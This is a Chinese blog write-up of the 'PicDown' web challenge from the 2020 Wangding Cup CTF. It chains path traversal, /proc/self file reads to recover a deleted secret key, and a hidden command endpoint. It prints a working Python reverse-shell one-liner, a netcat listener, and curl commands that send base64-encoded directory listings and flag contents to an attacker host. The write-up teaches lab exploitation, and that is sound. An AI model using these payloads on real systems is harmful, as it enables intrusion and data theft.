[网鼎杯 2020 白虎组]PicDown

最新推荐文章于 2023-10-08 17:26:40 发布
最新推荐文章于 2023-10-08 17:26:40 发布
阅读量500 收藏
点赞数
分类专栏: CTF刷题记录 文章标签: python Web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/120280672
版权

Python 反弹shell SECRET_KEY Flask框架 文件读取漏洞
关键词由CSDN通过智能技术生成

读取源码,反弹shell

文章目录

解题过程

打开环境,输入随便啥东西,url会变化,已GET方式进行的传参url
尝试文件读取,../../../../etc/passwd,会下载一个图片,使用编辑器打开,证明是可以文件读取的

下载

非预期

直接读取flag文件,../../../../flag,23333333333

预期解

读取
/proc/self/environ
/proc/self/cmdline

得到python2 app.py,读取源码

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

分析一下:
首先是定义了SECRET_KEY,然后将其删除,但是没有关闭,所以还能够在/proc/self/fd/xxx里找到,而且本题含有文件读取漏洞,所以可以得到SECRET_KEY
/page下是定义了一个文件读取的功能
/no_one_know_the_manager下是传两个参数,如果key == SECRET_KEY,那么就可以执行命令,但是没有回显,可以用来反弹shell.

SECRET_KEY

读取/proc/self/fd/xxx,数字从一开始,到三的时候发现

在这里插入图片描述

lxzY3xvJIDngLAx7RogcmxYWJX5MOWEKSCyT36xso7k=
python反弹shell

有了key值,就可使用python进行反弹shell
首先监听3333端口(port自定)

nc -lvp 3333

/no_one_know_the_manager?key=lxzY3xvJIDngLAx7RogcmxYWJX5MOWEKSCyT36xso7k=&shell=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',3333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

反弹shell之后,cat即可
在这里插入图片描述

curl反弹shell

客户机监听端口3333

nc -lvp 3333

no_one_know_the_manager?key=lxzY3xvJIDngLAx7RogcmxYWJX5MOWEKSCyT36xso7k=&shell=curl ip:port/`ls /|base64`

no_one_know_the_manager?key=lxzY3xvJIDngLAx7RogcmxYWJX5MOWEKSCyT36xso7k=&shell=curl ip:port/`cat /flag|base64`

执行的命令分别是

ls /|base64
cat /flag|base64

使用`执行命令
在这里插入图片描述
再解码一次,得到flag
在这里插入图片描述

参考链接

  1. 反弹shell命令
Sk1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
-----已搬运-------BUUCTF: [网鼎杯 2020 白虎]PicDown --- proc文件的利用, --- python反弹shell ---- python代码审计
Zero_Adam的博客
03-17 1237
参考自:whoami大佬的 一、自己做: 我自己做的时候,没有想找个文件目录穿越,用那些伪协议,来了个便,然后127.0.0.1的ssrf也尝试 这些都是些啥啊!!! /proc/self/environ /proc/self/cmdline 二、学到的&&不足: 当看到url中有?file= ... 的时候,当然是想到文件包含balabala之类的。同时还可能用PHP伪协议,php://filter啦,或者本地的直接file://,找个file还可以加空格绕过过滤哦,之前有个题做过的,
2020-网鼎杯-白虎-Web-PicDown(可复现) | 考查/proc文件系统应用
一醉一休的博客
08-22 731
利用linux下面的一个特性,系统中如果一个程序打开了一个文件没有关闭,即便从外部(如os.remove(SECRET_FILE))删除之后,在 /proc 这个进程的 pid 目录下的 fd 文件描述符目录下还是会有这个文件的 fd,通过这个我们即可得到被删除文件的内容,/proc/[pid]/fd 这个目录里包含了进程打开文件的情况,pid是进程记录的打开文件的序号。解决这两个问题,虚拟机服务器成功运行后,重新反弹shell,还是不行(裂开!🍺暴力破解最后一个数字,这道题是3,
/proc/self/目录的意义
热门推荐
dillanzhou的博客
09-28 1万+
我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信...
网鼎杯 2020 白虎PicDown
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
08-25 857
网鼎杯 2020 白虎PicDown复现Writeup
2020网鼎杯白虎赛题.zip
05-15
比赛试题附件,其中包括misc,re,crypto,pwn,web只有题目,没有环境,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
网鼎杯 白虎.zip
05-15
2020年第二届 网鼎杯网络安全大赛白虎 线下赛 真题 pwn reserve web misc 按照“网鼎杯”大赛两年一届的举办原则,第二届“网鼎杯”大赛5月开赛,6月19日至21日在广东省深圳市举办线下半决赛、总决赛和颁奖典礼。
2020网鼎杯青龙白虎部分试题.rar
05-14
2020网鼎杯青龙白虎部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎
[网鼎杯 2020 白虎]picdown
03-16
picdown 是一个图片下载工具,可以通过输入图片链接,将图片下载到本地。它可以支持多线程下载,提高下载速度。同时,它还可以对下载的图片进行重命名和分类保存。这个工具在网站开发和图片爬虫方面都有很大的用处。
[BUUCTF][网鼎杯 2020 白虎]PicDown
cosmoslin的博客
01-24 1071
考点 文件读取 反弹shell 解题 在输入框输入数字会在url后面添加参数,利用该参数来尝试文件读取 获取启动指定进程的完整命令 /proc/self/cmdline 获得 python2 app.py 那么我们再读一下这个文件 /proc/self/cwd/app.py 得到 from flask import Flask, Response from flask import render_template from flask import request import os import u
[网鼎杯 2020 白虎]PicDown(精讲)
记录学习,一起进步
03-24 934
[网鼎杯 2020 白虎]PicDown(精讲)
[网鼎杯 2020 白虎]PicDown --proc文件的利用--python反弹shell
unexpectedthing的博客
11-15 926
文章目录前言wp参考 前言 这个题跟到wp做的,确实思路很像一个渗透过程了,值得好好学习。 wp 首先打开环境,F12,dirsearch和御剑都没有扫描出什么东西。然后输入一个输入框,填入抓包 有个url的GET参数,我们尝试SSRF url=file://127.0.0.1/flag.php或者php伪协议,都没有什么反应。然后尝试目录穿越 ?url=../../etc/passwd 说明存在文件包含,目录穿越可以实现 我们知道/proc文件系统,所以我们使用目录穿越爆出文件目录 ?url=../
[网鼎杯 2020 白虎]PicDown python反弹shell proc/self目录的信息
最新发布
m0_64180167的博客
10-08 212
这里确实完全不会 第一次遇到一个只有文件读取思路的题目这里也确实说明还是要学学一些其他的东西了首先打开环境只存在一个框框 我们通过 目录扫描 抓包 注入 发现没有用我们测试能不能任意文件读取发现读取成功其次我到这里就没有思路了我们首先学东西吧当遇到文件读取我们可以读取什么。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值